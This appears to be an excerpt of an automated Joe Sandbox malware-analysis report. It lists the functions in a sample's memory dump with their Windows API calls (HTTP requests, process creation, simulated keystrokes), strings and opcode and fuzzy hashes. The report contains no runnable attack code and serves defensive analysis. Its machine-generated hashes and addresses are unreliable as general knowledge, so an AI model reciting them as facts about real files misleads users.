Opcode Fuzzy Hash: 2e10cc1e9f83184d58e916068e779272add60522dd9147be64ac08ff91d603ec
Instruction Fuzzy Hash: AB31EE75600204BBDB249F50ED88FAA37B9EB54311F52417AFA00F62F0E7B89D418B69

Function 003AFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003AFAA6
OleUninitialize.OLE32(?,00000000), ref: 003AFB45
UnregisterHotKey.USER32(?), ref: 003AFC9C
DestroyWindow.USER32(?), ref: 003E45D6
FreeLibrary.KERNEL32(?), ref: 003E463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 003E4668

Strings

close all, xrefs: 003AFAA1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: ee286afff34c49c12531178b2ca90b9e15906fa7315e1dde1b65c36d720be849
Instruction ID: be315375f0f1f3a8949d072b5ac2db77cbdbad8b31d0d2593061a2f2b46c3b7f
Opcode Fuzzy Hash: ee286afff34c49c12531178b2ca90b9e15906fa7315e1dde1b65c36d720be849
Instruction Fuzzy Hash: BBA16C31701222CFCB2AEF55C595A69F364FF0A714F5142BDE80AAB2A1CB30AD16CF54

Function 00419113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00419167
VariantInit.OLEAUT32(?), ref: 00419238
VariantInit.OLEAUT32(?), ref: 00419339
VariantClear.OLEAUT32(?), ref: 00419343
VariantClear.OLEAUT32(?), ref: 004193A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0041931C
Null Object assignment in FOR..IN loop, xrefs: 004191C8, 004192F6, 004193AE
,,C, xrefs: 004191E5

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,C$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-3706429018
Opcode ID: c083c3dd17c0aeccc74fe6e0eb1667821d7f6c35f3c199487228e21c85b06b04
Instruction ID: ee752e2b92af4cdc56ed7da98ba355c28525f344efa6673b2af86974ac5e605e
Opcode Fuzzy Hash: c083c3dd17c0aeccc74fe6e0eb1667821d7f6c35f3c199487228e21c85b06b04
Instruction Fuzzy Hash: E291A131A00219ABDF24DFA1C858FEFB7B8EF49710F10855AF915AB280D7749D85CBA4

Function 003FA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,003FA439), ref: 003FA377

Strings

TEXT, xrefs: 003FA2AE
CLASSNN, xrefs: 003FA119
REGEXPCLASS, xrefs: 003FA13C
NAME, xrefs: 003FA1A9
CLASS, xrefs: 003FA0F6
INSTANCE, xrefs: 003FA285

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: d06b9ee03a9146d550752cf1f692abe0d1a547ba638e69b74fb5ef61972d0e05
Instruction ID: bc29c1b48f026925bc3392fb0f6b339087b74d48b41074190b4776e6d3584321
Opcode Fuzzy Hash: d06b9ee03a9146d550752cf1f692abe0d1a547ba638e69b74fb5ef61972d0e05
Instruction Fuzzy Hash: 6891E9B1A04A09EADB0ADF60C481BFDFBB8FF04300F51851AD95DA7241DF316959CBA1

Function 003A2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 003A2EAE

Part of subcall function 003A1DB3: GetClientRect.USER32(?,?), ref: 003A1DDC
Part of subcall function 003A1DB3: GetWindowRect.USER32(?,?), ref: 003A1E1D
Part of subcall function 003A1DB3: ScreenToClient.USER32(?,?), ref: 003A1E45

GetDC.USER32 ref: 003DCD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003DCD45
SelectObject.GDI32(00000000,00000000), ref: 003DCD53
SelectObject.GDI32(00000000,00000000), ref: 003DCD68
ReleaseDC.USER32(?,00000000), ref: 003DCD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003DCDFB

Strings

U, xrefs: 003DCCD0

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: d101d4ebff2db8676e2ba06b1d5ae65eb0b5b71b5d08c0b0cfda96dfcaa6c251
Instruction ID: 21ed72b2a3ac72c1f1c3d03e9117fa57b401196f21f1c624e6543187f706cc29
Opcode Fuzzy Hash: d101d4ebff2db8676e2ba06b1d5ae65eb0b5b71b5d08c0b0cfda96dfcaa6c251
Instruction Fuzzy Hash: BA71F332520206DFCF238F64DC84AAA7BB6FF49310F15527BED559A2A6D7308C91DB60

Function 00411A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00411A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00411A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00411ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00411AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00411AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00411B10
InternetCloseHandle.WININET(00000000), ref: 00411B57

Part of subcall function 00412483: GetLastError.KERNEL32(?,?,00411817,00000000,00000000,00000001), ref: 00412498
Part of subcall function 00412483: SetEvent.KERNEL32(?,?,00411817,00000000,00000000,00000001), ref: 004124AD

Strings

, xrefs: 00411B01

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 3d7210cb28b983f60f4c3d8db0d11d36f4fbeb1f6202da49956e2cbfeb39db3d
Instruction ID: 75709d603721daf6b5f3cf2c5fb7cf644507aa07197ecca96a3cd0b72dd0df1d
Opcode Fuzzy Hash: 3d7210cb28b983f60f4c3d8db0d11d36f4fbeb1f6202da49956e2cbfeb39db3d
Instruction Fuzzy Hash: B84184B1601218BFEB118F50CC85FFB7BACEF08354F00412BFA059A251E7749E859BA9

Function 00418C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0042F910), ref: 00418D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0042F910), ref: 00418D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00418ED6
SysFreeString.OLEAUT32(?), ref: 00418F00

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 2f69732ffbe0a56ccb457e9c0e5dfbf19f9803a3e795d914e570c13f0d94c2ce
Instruction ID: 44058bdc773876b145e2fce2ad020e4b7669c0f404fca0bd060eb2dc96d8e25e
Opcode Fuzzy Hash: 2f69732ffbe0a56ccb457e9c0e5dfbf19f9803a3e795d914e570c13f0d94c2ce
Instruction Fuzzy Hash: DAF13A71A00209AFCF14DF94C884EEEBBB9FF49314F108499F905AB251DB35AE86CB55

Function 0041F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0041F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0041F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0041F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0041F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0041FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0041FA7C
CloseHandle.KERNEL32(?), ref: 0041FAAB
CloseHandle.KERNEL32(?), ref: 0041FB22

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: f645c664e8334af7fc94d0a5632d958f84da8b764d46b55fbc97ac2ecd6f9725
Instruction ID: ee0435207209fefcd6afb633dc7285529783a34bb156a03ad50d4d7347b1a96e
Opcode Fuzzy Hash: f645c664e8334af7fc94d0a5632d958f84da8b764d46b55fbc97ac2ecd6f9725
Instruction Fuzzy Hash: E9E19F716042009FC715EF24C881BABBBE5EF85354F14856EF8999F2A1CB34EC86CB56

Function 00404CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00403697,?), ref: 0040468B

Part of subcall function 0040466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00403697,?), ref: 004046A4

Part of subcall function 00404A31: GetFileAttributesW.KERNEL32(?,0040370B), ref: 00404A32

lstrcmpiW.KERNEL32(?,?), ref: 00404D40
_wcscmp.LIBCMT ref: 00404D5A
MoveFileW.KERNEL32(?,?), ref: 00404D75

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 338ce91b7467d7ccf4b1f5853d2d2a2a38fe92bab31115a10ca888e62b51f6b3
Instruction ID: a4f3f8cedbb7631b630807e30f0c02bdc109e926a62df0b5efd03cdb46cc1516
Opcode Fuzzy Hash: 338ce91b7467d7ccf4b1f5853d2d2a2a38fe92bab31115a10ca888e62b51f6b3
Instruction Fuzzy Hash: AA5152B21083459BC725DBA0D881EDBB3ECAF85350F40093FB689D7191EF35A588C76A

Function 00428645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004286FF

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: b003947bcfe33c2f46bb07a3cd9be5dee6dbf63c68453381e6ad3f64ab2404f3
Instruction ID: fba50fc9449dd4da6dcbb6d3697ca984a4d892c1c80101cb17643b5017b995f9
Opcode Fuzzy Hash: b003947bcfe33c2f46bb07a3cd9be5dee6dbf63c68453381e6ad3f64ab2404f3
Instruction Fuzzy Hash: 0C51B630701274BEDB209F28EC85FAE7B64EB05354FE0412BF910D62A1CF79A951CB59

Function 003A2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 003DC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003DC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003DC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003DC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003DC370
DestroyIcon.USER32(00000000), ref: 003DC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003DC39C
DestroyIcon.USER32(?), ref: 003DC3AB

Part of subcall function 0042A4AF: DeleteObject.GDI32(00000000), ref: 0042A4E8

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 1e015f266ea0ecf18cd9055cc59ce3309f6dc8fa5e2d7fd730d6cadcb9bdd865
Instruction ID: 8bc46c2f23bc4922d2bca40c47f02ef43389e0c96ca26addd076f9fc12c2d019
Opcode Fuzzy Hash: 1e015f266ea0ecf18cd9055cc59ce3309f6dc8fa5e2d7fd730d6cadcb9bdd865
Instruction Fuzzy Hash: 5551BC71A10206AFDB25EF28DC45FAB37B9EB49310F504539F90297690D7B0EC51DB60

Function 003F966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 003FA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 003FA84C
Part of subcall function 003FA82C: GetCurrentThreadId.KERNEL32 ref: 003FA853
Part of subcall function 003FA82C: AttachThreadInput.USER32(00000000,?,003F9683,?,00000001), ref: 003FA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 003F968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003F96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003F96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 003F96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003F96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003F96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 003F96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003F96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003F96FB

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 6de62274130b89a62795cdf10a2113ec067488374ada33d669ce80247ac9a088
Instruction ID: 2fa032a2a6dcb66c2c746fb460d06f2bbb657a2626ef72646543a7ec8ad9dcc0
Opcode Fuzzy Hash: 6de62274130b89a62795cdf10a2113ec067488374ada33d669ce80247ac9a088
Instruction Fuzzy Hash: 1011E9B1A10518BEF6216F60DC49F7A3F2DDB4C751F900435F3449B0A0C9F25C12DAA8

Function 003F8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,003F853C,00000B00,?,?), ref: 003F892A
HeapAlloc.KERNEL32(00000000,?,003F853C,00000B00,?,?), ref: 003F8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003F853C,00000B00,?,?), ref: 003F8946
GetCurrentProcess.KERNEL32(?,00000000,?,003F853C,00000B00,?,?), ref: 003F894E
DuplicateHandle.KERNEL32(00000000,?,003F853C,00000B00,?,?), ref: 003F8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,003F853C,00000B00,?,?), ref: 003F8961
GetCurrentProcess.KERNEL32(003F853C,00000000,?,003F853C,00000B00,?,?), ref: 003F8969
DuplicateHandle.KERNEL32(00000000,?,003F853C,00000B00,?,?), ref: 003F896C
CreateThread.KERNEL32(00000000,00000000,003F8992,00000000,00000000,00000000), ref: 003F8986

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 0eb524f64ad23f0f6787eb16a563e9bf68963b7725022360352ac27f67b017fa
Instruction ID: 8402a33d6651f829a78435390380d6dcd160ac5c552f1223acdfbbc6e87d9754
Opcode Fuzzy Hash: 0eb524f64ad23f0f6787eb16a563e9bf68963b7725022360352ac27f67b017fa
Instruction Fuzzy Hash: 2301AC75740308FFE620ABA5DD4AF673B6CEB89711FC04471FA05DB191CA719C158A24

Function 00419B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00419BA4, 00419EC8
Not an Object type, xrefs: 00419B7B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: d7249cdc77d5c0877b9ff64a6f9bc3c89a7ef2cc9381f703b14d19bd0997e536
Instruction ID: 6cbb698c6df4377f4c3fce1918b65a8021a320c20310aa47c590fe7b27fe90f1
Opcode Fuzzy Hash: d7249cdc77d5c0877b9ff64a6f9bc3c89a7ef2cc9381f703b14d19bd0997e536
Instruction Fuzzy Hash: 15C19171A003099BDF10DF58D894BEFB7F5BB48314F14846AE905AB280E774AD85CB94

Function 0041975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 003F710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003F7044,80070057,?,?,?,003F7455), ref: 003F7127
Part of subcall function 003F710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003F7044,80070057,?,?), ref: 003F7142
Part of subcall function 003F710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003F7044,80070057,?,?), ref: 003F7150
Part of subcall function 003F710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003F7044,80070057,?), ref: 003F7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00419806
_memset.LIBCMT ref: 00419813
_memset.LIBCMT ref: 00419956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00419982
CoTaskMemFree.OLE32(?), ref: 0041998D

Strings

NULL Pointer assignment, xrefs: 004199DB

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: d546ec741cb2794ce7c4fc8c577c547de7ad495592398aecd23b67376327aced
Instruction ID: 880f6097460d2ed269e97a581b8c2971c3e40251fb29a27df9e2f71efb020d84
Opcode Fuzzy Hash: d546ec741cb2794ce7c4fc8c577c547de7ad495592398aecd23b67376327aced
Instruction Fuzzy Hash: ED914771D00218EBDB11DFA1CC95EDEBBB9EF09350F10406AF519AB291DB349A44CFA0

Function 00426D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00426E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00426E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00426E52
_wcscat.LIBCMT ref: 00426EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00426EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00426EF2

Strings

SysListView32, xrefs: 00426DF6

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 981d0bbe9e45c77fa18ef9b13eefb45fddb443f264e7d38026c8476bf63c554a
Instruction ID: c491bf9556cfbbf20700ffa6c14b4d040ba3b224afbaaf7183b05fa38035c43f
